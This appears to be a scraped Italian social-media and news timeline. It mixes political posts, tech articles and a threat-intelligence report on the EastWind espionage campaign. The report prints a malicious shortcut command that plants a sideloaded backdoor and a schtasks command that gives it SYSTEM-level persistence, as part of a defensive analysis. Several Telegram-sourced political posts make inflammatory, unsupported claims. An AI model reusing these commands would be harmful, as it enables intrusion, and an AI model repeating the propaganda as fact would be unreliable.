It seems odd that cameras haven’t taken over everything. They work well, and a live view is handy. However, if you don’t have a camera, there are clear alternatives. For as much as the Xtool system is clever, it still doesn’t help you with crooked alignment. It is, however, better than the wrapping paper method for things where you don’t know the size already.
If you do know the size of the workpiece, though, it really isn’t that handy. Sure, you don’t have to tape down paper and score it with a framing cut, but that’s a small price to pay for the benefit you get. If we were building our own cutter, we’d seriously consider adding a probe, though.
How do you get engraving to go where you want it? Do you have another method? Let us know in the comments. If you haven’t splurged on a laser yet, you might enjoy a tutorial.
Fratelli d’Italia contro Elodie: “Attacca Meloni solo per vendere il calendario”
@Politica interna, europea e internazionale
Fratelli d’Italia contro Elodie: “Attacca Meloni solo per vendere il calendario” Fratelli d’Italia si scaglia contro Elodie dopo le parole di quest’ultima su Giorgia Meloni. In un’intervista a La Repubblica, infatti, la cantante ha dichiarato: “Non ho simpatia per questo governo, perché per me
like this
reshared this
A sei anni dalla tragedia del Ponte Morandi non si scorge ancora una luce in fondo al tunnel del processo. Se tutto andrà bene, la sentenza di primo grado per i 59 indagati arriverà nel 2026. Di coloro che hanno tratto il massimo profitto dalle mancate manutenzioni del viadotto, però, non risulta neppure l'ombra in tribunale. Anzi, a questi signori abbiamo pure offerto una generosa liquidazione pagando a peso d'oro le quote di Aspi.
Dopo trent'anni di Unione europea, lo Stato italiano non è neppure in grado di render giustizia alle vittime delle privatizzazioni selvagge e alle loro famiglie. L'unica cosa di cui sono capaci le nostre istituzioni ormai è proporre parole vuote, dense soltanto d'ipocrisia, mentre si procede a passo spedito sulla strada che ha distrutto il viadotto Polcevera e dilaniato il nostro Paese.
PRO ITALIA
Il ministero della Difesa Russo ha comunicato che un blindato di fabbricazione italiana Shield è stato distrutto in un bombardamento nella regione russa di Kursk. Quindi si presume che siano entrati in Russia con mezzi e armi Italiane.
Crosetto qualche giorno fa ci ha rassicurati che nessun armamento inviato a Zelensky dall'Italia è stato usato per invadere il territorio Russo. Tajani ha dichiarato che le armi italiane sul suolo Russo non si usano.
La donna, madre e Cristiana invece tace. Qui ci devono spiegare un paio di cosette: o non contano nulla nemmeno agli occhi di Zelensky, oppure ci stanno mentendo spudoratamente sapendo di mentire.
In tutto ciò ancora è segreto l'elenco delle armi inviate in Ucraina e dall'opposizione non si vede alcuna iniziativa concreta per fare chiarezza. Soprattutto da quel PD guidato da Elly Schlein che sembra la guardia del corpo di Meloni per quanto riguarda la posizione guerrafondaia e ultra atlantista assunta dall'Italia.
Traditori della patria!
T.me/GiuseppeSalamone
Sono mesi che la propaganda criminale occidentale ci racconta che gli Usa stiano lavorando per fermare la carneficina a Gaza, addirittura da un paio di settimane, mentre continuiamo a vedere bambini fatti a pezzi da Netanyahu, ci propongono a reti unificate le parole di Biden secondo le quali un cessate il fuoco è vicino.
Mentre i pennivendoli ci raccontano una narrazione volutamente distorta, dal Dipartimento di Stato Usa approvano vendite di armi per il criminale di guerra Netanyahu e lo stato terrorista di Israele per oltre 20 miliardi di dollari. Ripeto: 20 MILIARDI DI DOLLARI!
Una cinquantina di aerei per circa 19 miliardi di dollari; veicoli tattici, carri armati e missili per altri 2,1 miliardi di dollari. Inoltre si profila anche l'approvazione per equipaggiamento di aerei, lanciatori di missili aria-aria a medio raggio, cannoni M61A Vulcan e sistemi di posizionamento globale e di navigazione inerziale integrati.
Una lista della spesa che serve per continuare a massacrare i Palestinesi. Ora ditemi quale altro paese al mondo è presente in tutti i campi di battaglia più caldi ammassando armi: Ucraina, Palestina e Taiwan. Ditemi quale altro paese continua a lavorare per inasprire ogni singola zona di conflitto. Ditemi quale altro paese continua a fare profitti vendendo o regalando armi in giro per il mondo.
Ditemi quale altro Paese, al mondo, è più criminale degli Stati Uniti d'America e dello stato terrorista di israele.
T.me/GiuseppeSalamone
Giuseppe Salamone
reshared this
Badilate sui denti per i propagandisti Nato Mauro, penna di Repubblica, Mieli e Quirico. Quelli che oggi sono considerati tra i migliori intellettuali italiani:
"La Russia sarebbe colpevole di avere infranto il diritto internazionale invadendo l’Ucraina. Poiché crediamo nella razionalità, patrimonio universale dell’umanità, vorremmo chiedere allo stimato giornalista se la violazione delle frontiere da parte della Nato a Belgrado, in Afghanistan, in Iraq, in Libia avrebbe dovuto implicare armi, addestramento militare, mercenari e scesa in campo dell’intelligence da parte di Cina e Russia a favore di quei Paesi aggrediti. Vorremmo anche chiedergli se l’ordine internazionale si viola soltanto oltrepassando le frontiere di uno Stato sovrano. L’espansionismo della Nato ai confini della Russia, unico Paese escluso dalla sicurezza collettiva, non calpesta l’indivisibilità della sicurezza in Europa sancita dai principi di Helsinki e traslata nella Carta di Parigi dell’Osce?" (Elena Basile)
T.me/GiuseppeSalamone
Bambina rom investita a Torino, Salvini attacca i servizi sociali. La replica: “Strumentalizza tragedia a fini politici”
@Politica interna, europea e internazionale
L’Ordine degli Assistenti Sociali risponde a Matteo Salvini, che aveva tirato in ballo la categoria commentando il caso della bambina di 2 anni morta investita da un’auto in manovra nel parcheggio dell’ospedale San
Politica interna, europea e internazionale reshared this.
🔁 Migrazione Peertube.uno in corso! feddit.it/post/10097174 Il nuovo post di Filippodb è su feddit.it/c/devol ⚠️ AVVISO ❗️Stiamo migra...
Migrazione Peertube.uno in corso!
feddit.it/post/10097174
Il nuovo post di Filippodb è su feddit.it/c/devol
⚠️ AVVISO
❗️Stiamo migrando peertube.
Informa Pirata: informazione e notizie
Migrazione Peertube.uno in corso! https://feddit.it/post/10097174 Il nuovo post di Filippodb è su feddit.it/c/devol ⚠️ AVVISO ❗️Stiamo migrando peertube.Telegram
La sera del 14, nel ristorante (buono!) dove sono andata a mangiare, il proprietario, chiacchierando con un amico o avventore abituale, riuscì a dare la colpa della tragedia agli immigrati.
Ne rimasi talmente scioccata che manco mi ricordo con quale volo pindarico della fantasia fosse riuscito a giungere a quella conclusione.
Ma come cazzo si fa?
Me lo chiesi allora e me lo chiedo ancora, ogni giorno.
Non può essere più facile prendersela con i più deboli che con chi detiene il potere di fare le cose per bene e invece le fa ammerda per proprio tornaconto.
Bisogna tenere d'occhio e spaccare le palle ai "controllori", non ai poveracci!
#PonteMorandi
Musk: ma quale attacco DDoS! 9 milioni di ascoltatori per una interessante intervista
Lunedì sera sulla piattaforma X Spaces avrebbe dovuto svolgersi la tanto attesa intervista di Elon Musk con l’ex presidente degli Stati Uniti Donald Trump. Tuttavia, l’evento, previsto per le 20:00 è stato rinviato a causa di gravi problemi tecnici.
Subito dopo l’inizio della trasmissione si è verificato un problema tecnico e l’intervista è iniziata 42 minuti dopo. Coloro che sono riusciti a connettersi alla piattaforma hanno riferito che la musica lo-fi è stata trasmessa dall’account di Trump per circa 30 minuti.
18 minuti dopo l’inizio previsto, Musk ha annunciato che X era l’obiettivo di un “massiccio attacco DDoS “. Tuttavia, il resto di X sembrava funzionare bene. Una fonte aziendale ha confermato che in realtà non si è verificato alcun attacco di negazione del servizio. Un altro dipendente ha detto che con molta probabilità Musk mentiva riguardo all’attacco.
In una serie di post successivi, Musk ha affermato che lunedì la società ha testato il sistema con 8 milioni di ascoltatori. Quando finalmente l’intervista è iniziata, intorno alle 20:40, X ha riferito che Space aveva 915.000 ascoltatori.
Musk ha ripetuto la dichiarazione sull’attacco DDoS quando finalmente è iniziata la trasmissione. “Come dimostra questo massiccio attacco, l’opposizione semplicemente non vuole che la gente senta ciò che il presidente Trump ha da dire“, ha detto. Quindi, se il miliardario ha mentito, le sue parole sarebbero una sorta di manipolazione politica.
youtube.com/embed/JUlDHBKR-fM?…
Il mancato avvio dell’intervista ha ricordato gli eventi del 2023, quando il governatore della Florida Ron DeSantis annunciò su X la sua partecipazione alla corsa presidenziale. Poi l’evento è stato accompagnato anche da problemi tecnici, che Elon ha spiegato con un sovraccarico dei server.
Il Register inoltre non ha trovato prove di un attacco DDoS contro X. La mappa delle minacce informatiche di Check Point Software non ha registrato livelli insoliti di attività al momento della trasmissione. La mappa degli attacchi DDoS in tempo reale di NetScout ha mostrato solo piccoli attacchi negli Stati Uniti.
Quando finalmente l’intervista è iniziata, era inclusa una retorica e un linguaggio che sarebbero stati familiari ai fan di entrambi i partecipanti. Trump ha criticato le politiche dell’amministrazione Biden, ha definito i suoi oppositori politici radicali pericolosi e ha messo in guardia dalle conseguenze negative. Ha anche fatto alcune dichiarazioni criptiche, inclusa la menzione del “riscaldamento nucleare“.
Entrambi gli interlocutori hanno lamentato l’eccessiva regolamentazione come un ostacolo per le imprese e l’innovazione, chiedendo riforme. Hanno trovato un linguaggio comune sulla questione dello sviluppo delle infrastrutture di trasporto interurbano ad alta velocità, anche se Trump preferisce i treni e Musk preferisce fare affidamento sui tunnel sotterranei.
Durante la conversazione è stato toccato anche il tema della tecnologia. Trump ha espresso preoccupazione per il fatto che il potenziale dell’intelligenza artificiale potrebbe non essere realizzato a causa delle attuali politiche energetiche che danno priorità alle fonti rinnovabili. “L’intelligenza artificiale richiede il doppio dell’energia prodotta attualmente dagli Stati Uniti”, ha affermato il politico. Musk ha espresso l’opinione che la generazione solare diventerà in futuro la principale fonte di energia negli Stati Uniti.
In sintesi, questa intervista, nonostante le difficoltà tecniche, è stata un momento culminante che ha dimostrato sia le capacità che i limiti delle moderne piattaforme di trasmissione online. Ha inoltre offerto al pubblico l’opportunità di ascoltare due figure influenti su un’ampia gamma di questioni attuali, dalla politica all’economia, alla tecnologia e al futuro dell’energia.
L'articolo Musk: ma quale attacco DDoS! 9 milioni di ascoltatori per una interessante intervista proviene da il blog della sicurezza informatica.
EastWind campaign: new CloudSorcerer attacks on government organizations in Russia
In late July 2024, we detected a series of ongoing targeted cyberattacks on dozens of computers at Russian government organizations and IT companies. The threat actors infected devices using phishing emails with malicious shortcut attachments. These shortcuts were used to deliver malware that received commands via the Dropbox cloud service. Attackers used this malware to download additional payloads onto infected computers, in particular tools used by the APT31 group and an updated CloudSorcerer backdoor. We dubbed this campaign EastWind.
Below are the most interesting facts about the implants used in this campaign:
- The malware downloaded by the attackers from Dropbox has been used by APT31 since at least 2021. We named it GrewApacha.
- The attackers updated the The CloudSorcerer backdoor (described by us in early July 2024) ) after we published our blogpost. It currently uses LiveJournal (a social network popular in Russia) and Quora profiles as initial C2 servers.
- The attacks additionally deploy a previously unknown implant with a classic backdoor functionality, which we dubbed PlugY. It is loaded via the CloudSorcerer backdoor, and its command set is quite extensive. It supports three different protocols for communicating with C2, and what’s more, its code resembles that of the DRBControl backdoor (aka Clambling), which several companies attribute to the APT27 group.
Technical information
As mentioned above, the attackers used spear phishing to gain an initial foothold into the organizations. They sent malicious emails with attached RAR archives to target organizational email addresses. These archives had the following names:
- инициативная группа из Черниговского района Приморского края.rar (translates as advocacy group from Chernigov district of Primorsky Krai.rar)
- вх.rar
They contained the following files:
- .con folder, which contained:
- 1.docx, a legitimate decoy document
- desktop.exe, a legitimate file
- VERSION.dll, a malicious file
- A malicious shortcut with a name similar to that of the archive.
When clicked on, the shortcut executed the following command:
C:\Windows\System32\cmd.exe /c .con\1.docx & echo F | move .con\doc %public%\Downloads\desktop.exe & move .con\docs %public%\Downloads\VERSION.dll & start /b %public%\Downloads\desktop.exe && exit
This command opens the document contained in the archive, copies the files desktop.exe and VERSION.dll to the C:\Users\Public\Downloads folder, and then launches the desktop.exe file.
Note the use of a similar infection method in an attack on a US organization that involved use of the CloudSorcerer backdoor, reported by Proofpoint in July 2024:
Contents of the malicious archive used in the attack on a US organization
VERSION.dll – a backdoor that uses Dropbox
The attackers use classic DLL sideloading to load the malicious library VERSION.dll into the desktop.exe process:
MD5 | 1f5c0e926e548de43e0039858de533fc |
SHA1 | 426bbf43f783292743c9965a7631329d77a51b61 |
SHA256 | 668f61df2958f30c6a0f1356463e14069b3435fb4e8417a948b6738f5f340dd9 |
File size | 9.82 MB |
This library is a backdoor packed using the VMProtect tool. When started, it attempts to contact Dropbox using a hardcoded authentication token. Once connected to the Dropbox cloud, the backdoor reads commands to be executed from the file <computer name>/a.psd contained in the storage. The backdoor supports a total of five commands, named as follows:
- DIR
- EXEC
- SLEEP
- UPLOAD
- DOWNLOAD
The results of running these commands are uploaded to the file <computer name>/b.psd that is stored in the cloud..
GrewApacha: a RAT used by APT31 since 2021
The threat actors used the above backdoor to collect information about infected computers and install additional malware on them. On one of these computers, we observed the download of the following files to the directory C:\ProgramData\USOShared\Logs\User:
- msedgeupdate.exe, a legitimate executable file signed by Microsoft
- msedgeupdate.dll, a malicious library
- wd, a file with an encrypted payload
When the attackers launched msedgeupdate.exe, the malicious library msedgeupdate.dll was loaded into its process by means of DLL sideloading:
MD5 | f6245f64eaad550fd292cfb1e23f0867 |
SHA1 | fccdc059f92f3e08325208f91d4e6c08ae646a78 |
SHA256 | e2f87428a855ebc0cda614c6b97e5e0d65d9ddcd3708fd869c073943ecdde1c0 |
File size | 9 MB |
While this set of three files resembles the “sideloading triad” that is typical of attacks involving PlugXanalysis of these files revealed that the malware inside them is a RAT of the APT31 group, already described in 2021 and 2023. We dubbed this RAT ‘GrewApacha’.
The behavior of the loader (msedgeupdate.dll) hasn’t changed since the 2023 post was published. As before, it decrypts the payload stored on the drive using the XOR key 13 18 4F 29 0F, and loads it into the dllhost.exe process.
While the GrewApacha loader has not changed since last year, there have been minor differences introduced to the RAT itself. Specifically, the new version now uses two C2 servers instead of one. Through network communications, the cybercriminals first retrieve a webpage with a profile bio on GitHub. This profile contains a string encoded with the Base64 algorithm:
Profile of a user created by the attackers on GitHub
The malware first decodes the string extracted from the GitHub profile, then decrypts it using a single-byte XOR algorithm with the key 0x09, thereby obtaining the address of the main C2 server (for the screenshot above – update.studiokaspersky[.]com).
New version of the CloudSorcerer backdoor
Besides launching the GrewApacha Trojan described above, we found that the attackers also downloaded the CloudSorcerer backdoor onto infected computers. To do that, they downloaded and launched a tool named GetKey.exe that is packed with the VMProtect obfuscator.
MD5 | bed245d61b4928f6d6533900484cafc5 |
SHA1 | e1cf6334610e0afc01e5de689e33190d0c17ccd4 |
SHA256 | 5071022aaa19d243c9d659e78ff149fe0398cf7d9319fd33f718d8e46658e41c |
File size | 51 KB |
The utility receives a four-byte number (the value of the GetTickCount() function at runtime), encrypts it using the CryptProtectData function, and then outputs the number with its ciphertext. The screenshot below shows the code of the tool’s main function:
The attackers used the tool output on their side as a unique key to encrypt the payload file. By handling the encryption with the CryptProtect function, the attackers made it possible to decrypt the payload only on the infected machine.
After running the tool, the attackers downloaded the following files to the infected machine:
- The renamed legitimate application dbgsrv.exe (example name: WinDRMs.exe), signed by Microsoft
- The malicious library dll
- A file with the .ini extension, containing the encrypted payload. The name of this file varied across infected machines.
As in the above case of GrewApacha, this set resembles the “sideloading triad” used in attacks involving PlugX.
IIn most cases, the attackers uploaded files inside a subdirectory of C:\ProgramData, such as C:\ProgramData\Microsoft\DRM. Afterwards, they used the task scheduler to configure the renamed dbgsrv.exe application to launch at OS startup. This involved the schtasks utility (usage example:
schtasks /create /RL HIGHEST /F /tn \Microsoft\Windows\DRM\DRMserver /tr "C:\ProgramData\Microsoft\DRM\WinDRMs.exe -t run" /sc onstart /RU SYSTEM").
Upon startup of the renamed application, the malicious dbgeng.dll library is loaded into its process, again using DLL sideloading.
MD5 | d0f7745c80baf342cd218cf4f592ea00 |
SHA1 | c0e4dbaffd0b81b5688ae8e58922cdaa97c8de25 |
SHA256 | bd747692ab5db013cd4c4cb8ea9cafa7577c95bf41aa2629a7fea875f6dcbc41 |
File size | 1.11 MB |
This library was programmed to read the previously mentioned .ini file, which contains:
- The ciphertext of a four-byte number generated and encrypted by the GetKey.exe utility
- A PE file compressed with the LZNT1 algorithm and XOR-encrypted using the four-byte number as a key.
Accordingly, the library proceeded to decrypt the four-byte number using the CryptUnprotectData function, use it to decrypt the .ini file, and then load the decrypted file into the memory of the current process.
Analysis of the decrypted .ini files revealed them to be updated versions of the CloudSorcerer backdoor. After we publicly described this backdoor in early July 2024, the attackers modified it: the new version of CloudSorcerer uses profile pages on the Russian-language social network LiveJournal and the Q&A site Quora as the initial C2 servers:
As with past versions of CloudSorcerer, the profile bios contain an encrypted authentication token for interaction with the cloud service.
PlugY: an implant that overlaps with APT27 tools
Having analyzed the behavior of the newly found CloudSorcerer samples, we found that the attackers used it to download a previously unknown implant. This implant connects to the C2 server by one of three methods:
- TCP protocol
- UDP protocol
- Named pipes
The set of commands this implant can handle is quite extensive, and implemented commands range from manipulating files and executing shell commands to logging keystrokes and monitoring the screen or the clipboard.
Analysis of the implant is still ongoing, but we can conclude with a high degree of confidence that the code of the DRBControl (aka Clambling) backdoor was used to develop it. This backdoor was described in 2020 by Trend Micro and Talent-Jump Technologies. Later, Security Joes and Profero linked it to the APT27 group. The backdoor also has similarities to PlugX.
Our comparison of samples of the PlugY implant (MD5 example: faf1f7a32e3f7b08017a9150dccf511d) and the DRBControl backdoor (MD5: 67cfecf2d777f3a3ff1a09752f06a7f5) revealed that these two samples have the exact same architecture. Additionally, many commands in them are implemented almost identically, as evidenced by the screenshots below:
Command code for retrieving information about connected disks in the DRBControl backdoor (left) and the implant (right)
Command code for retrieving information about the active window in the DRBControl backdoor (left) and the implant (right)
Command code for taking screenshots in the DRBControl backdoor (left) and the implant (right)
Thus, the code previously observed in attacks by APT27 was likely used in developing the implant.
While analyzing the PlugY implant we also noticed that it uses a unique malicious library to communicate with the C2 server via UDP. We found the very same library in the DRBControl backdoor, as well as several samples of the PlugX backdoor, which is popular among Chinese-speaking groups. Apart from DRBControl and PlugX, this library has not been detected in any other malware.
Screenshot of the library communicating with the C2 server via UDP
Tips for attack detection
The implants identified during the attack significantly differ from each other. As such, it’s necessary to use a separate set of IoCs for each malware used in any compromise.
The backdoor that uses Dropbox and is delivered via email can be found by looking for relatively large DLL files (> 5 MB) located in the directory C:\Users\Public. Regular access to the Dropbox cloud in network traffic can serve as an additional indicator of this backdoor’s operation.
The GrewApacha Trojan can be detected by searching for an unsigned file named msedgeupdate.dll in the file system. This file also reaches several megabytes in size.
The PlugY implant that is delivered using the CloudSorcerer backdoor launches a process named msiexec.exe for each user signed to the OS, and also creates named pipes with the name template \.\PIPE\Y. The presence of these two indicators in the system is strong evidence of an infection.
Conclusion
In attacks on government organizations, threat actors often use toolkits that implement a wide variety of techniques and tactics. In developing these tools, they go to the greatest lengths possible to hide malicious activity in network traffic. For instance, the attackers behind the EastWind campaign, for instance, used popular network services (GitHub, Dropbox, Quora, LiveJournal and Yandex.Disk) as C2 servers.
Notably, the EastWind campaign bore traces of malware from two different Chinese-speaking groups: APT27 and APT31. This clearly shows that APT groups very often team up, actively sharing knowledge and tools. To successfully counter such collaborations, we closely monitor the techniques and tactics of APT groups operating around the world.
Ita Airways nuovo sponsor della Juventus, ma Meloni fa saltare l’accordo
@Politica interna, europea e internazionale
Ci sarebbe il veto di Giorgia Meloni dietro lo stop all’accordo tra Ita Airways e la Juventus per fare della compagnia aerea il nuovo main sponsor del club torinese. Lo rivelano diverse indiscrezioni giornalistiche, secondo cui la presidente del Consiglio vuole evitare di dare altri
Politica interna, europea e internazionale reshared this.
Whacky Science: Using Mayonnaise to Study Rayleigh-Taylor Instability
Sometimes a paper in a scientific journal pops up that makes you do a triple-take, case in point being a recent paper by [Aren Boyaci] and [Arindam Banerjee] in Physical Review E titled “Transition to plastic regime for Rayleigh-Taylor instability in soft solids”. The title doesn’t quite do their methodology justice — as the paper describes zipping a container filled with mayonnaise along a figure-eight track to look at the surface transitions. With the paper paywalled and no preprint available, we have to mostly rely the Lehigh University press releases pertaining to the original 2019 paper and this follow-up 2024 one.
Rayleigh-Taylor instability (RTI) is an instability of an interface between two fluids of different densities when the less dense fluid acts up on the more dense fluid. An example of this is water suspended above oil, as well as the expanding mushroom cloud during a explosion or eruption. It also plays a major role in plasma physics, especially as it pertains to nuclear fusion. In the case of inertial confinement fusion (ICF) the rapidly laser-heated pellet of deuterium-tritium fuel will expand, with the boundary interface with the expanding D-T fuel subject to RTI, negatively affecting the ignition efficiency and fusion rate. A simulation of this can be found in a January 2024 research paper by [Y. Y. Lei] et al.
As a fairly chaotic process, RTI is hard to simulate, making a physical model a more ideal research subject. Mayonnaise is definitely among the whackiest ideas here, with other researchers like [Samar Alqatari] et al. as published in Science Advances opting to use a Hele-Shaw cell with dyed glycerol-water mixtures for a less messy and mechanically convoluted experimental contraption.
What’s notable here is that the Lehigh University studies were funded by the Lawrence Livermore National Laboratory (LLNL), which explains the focus on ICF, as the National Ignition Facility (NIF) is based there.
This also makes the breathless hype about ‘mayo enabling fusion power’ somewhat silly, as ICF is even less likely to lead to net power production, far behind even Z-pinch fusion. That said, a better understanding of RTI is always welcome, even if one has to question the practical benefit of studying it in a container of mayonnaise.
Ius Scholae, Lega contro Forza Italia: “La legge sulla cittadinanza va benissimo così com’è”
@Politica interna, europea e internazionale
Si apre uno scontro nella maggioranza di governo sul tema dello Ius Soli, anche se sarebbe più corretto parlare di Ius Scholae. L’apertura di Forza Italia a una revisione delle norme sulla concessione della cittadinanza italiana non è piaciuta alla Lega, che ha
Politica interna, europea e internazionale reshared this.
La "democrazia" europea, avanza...
NAZIEUROPEISMO
L'Unione Europea ha inviato una lettera a Elon Musk, chiedendogli di censurare l’intervista su X con Donald Trump.
👉“(ci sono) rischi potenziali nell'UE associati alla diffusione di contenuti che possono incitare alla violenza, all'odio e al razzismo in concomitanza con i principali eventi politici o sociali in tutto il mondo, compresi i dibattiti e le interviste relative alle elezioni”.
Il commissario europeo Thierry Breton ha minacciato Musk di conseguenze legali se non impedirà la diffusione di quella che definisce disinformazione. Precisando che la UE è pronta ad utilizzare tutti gli strumenti che ha per “proteggere” i cittadini europei dalla disinformazione e dai contenuti illegali.
La lettera cita piuttosto chiaramente l'intervista a Trump e ordina a Musk di informare immediatamente le autorità giudiziarie e amministrative europee spiegando dettagliatamente le misure che ha intrapreso per proteggere i cittadini europei da quello che gli stessi cittadini europei non devono poter vedere. Ovviamente per il loro bene.
In caso contrario scatteranno le sanzioni miliardarie stabilite dalla UE. Siamo evidentemente di fronte a qualcosa di molto simile alle leggi varate in Germania tra il 1933 e il 1945.
Ognuno tragga le sue conclusioni.
VOX ITALIA
US aligns with EU on Google antitrust case, hinting at enforcement measures
Following the recent US court ruling on Google’s market dominance, Washington may be aligning more closely with the Brussels approach to tech competition regulation, hinting at possible enforcement measures.
6 Gruppi Criminali sono i responsabili del 50% degli Attacchi Ransomware
“Le erbacce devono essere estirpate dalla radice altrimenti non faranno altro che rispuntare da un’altra parte“, questo è il cybercrime.
La prima metà del 2024 ha visto un costante aumento dell’attività dei gruppi di estorsione, nonostante gli sforzi significativi delle forze dell’ordine per reprimerli.
Secondo Unit 42, il numero di nuovi post di compromissione dei dati ha raggiunto 1.762, ovvero una media di 294 post al mese. Questo dato conferma che il livello di minaccia dei ransomware rimane elevato, nonostante le operazioni riuscite che non producono specifiche pubblicazioni
Si distinguono in particolare 6 gruppi, che rappresentano oltre la metà di tutti gli incidenti registrati. Sebbene gruppi BlackCat e LockBit abbiano ridotto la loro attività a causa dell’intervento delle forze dell’ordine, nuovi autori di minacce hanno preso il loro posto.
Tra questi spiccano RansomHub e DragonForce.
Confronto dei 6 principali gruppi di ransomware per (tutto il 2023 e la prima metà del 2024)
I settori più colpiti dagli attacchi sono stati il manifatturiero, la sanità e l’edilizia. Il settore manifatturiero è risultato essere il più vulnerabile, con il 16,4% di tutti gli attacchi, confermando l’importanza del settore per il ransomware.
Anche il settore sanitario, pur essendo altamente suscettibile alle interruzioni, ha subito attacchi significativi, con il 9,6% di tutti gli incidenti segnalati. Al terzo posto si colloca invece il settore edile con il 9,4%
Settori colpiti dal ransomware nella prima metà del 2024
Gli Stati Uniti si sono rivelati il Paese con il maggior numero di vittime di ransomware: il 52% di tutti gli incidenti. Tra i primi dieci paesi più colpiti figurano anche Canada, Regno Unito, Germania, Italia, Francia, Spagna, Brasile, Australia e Belgio.
Paesi in cui le organizzazioni sono state colpite dal ransomware nella prima metà del 2014
Gli analisti sottolineano che il motivo principale dell’aumento dell’attività ransomware nel 2024 è stato il rapido sfruttamento delle vulnerabilità recentemente identificate.
I criminali informatici sfruttano attivamente le opportunità per infiltrarsi nelle reti delle vittime, aumentare i privilegi e spostarsi lateralmente all’interno dei sistemi compromessi.
Nella prima metà del 2024 le forze dell’ordine hanno condotto con successo una serie di operazioni che hanno portato all’arresto di figure chiave e al sequestro delle infrastrutture di alcuni dei gruppi più noti. Tuttavia, nonostante questi sforzi, le minacce continuano ad evolversi.
Nuove fazioni stanno riempiendo il vuoto creato dalla chiusura dei player più anziani, evidenziando la necessità di un monitoraggio e un aggiornamento continui delle misure di difesa.
L'articolo 6 Gruppi Criminali sono i responsabili del 50% degli Attacchi Ransomware proviene da il blog della sicurezza informatica.
🧊 freezr 🥶
in reply to Informa Pirata • • •@Informa Pirata
La Disney è come la chiesa, possiede acri e acri di terreno, dove ci sono i parchi incluso Disney Spring, la quale sarebbe una piccola cittadina ma in realtà c'è solo un bellissimo centro commerciale all'aperto con ristoranti, negozi, etc... ed alberghi.
In questa area vastissima dove le strade hanno i nomi dei personaggi Disney, la omonima compagnia è esentata dal pagare imposte immobiliari.
Ci ha provato Ron De Santis, in una spinta omofonica, a fargli pagare le tasse. Ma la Disney ha minacciato di chiudere tende e baracche e a spostarsi altrove, mentre il GOP ha completamente silurato De Santis, perché quando mai i Repubblicani hanno chiesto di fare pagare le tasse a qualcuno? Ancor meno ad una compagnia profittevole come la Disney?
Il povero Ron ne ha pagato le conseguenze, da sfidante di Trump per le elezioni federali è stato completamente eclissato, non si vede e non si sente più.
In sostanza la Disney è intoccabile come il Vaticano in Italia...
Informa Pirata likes this.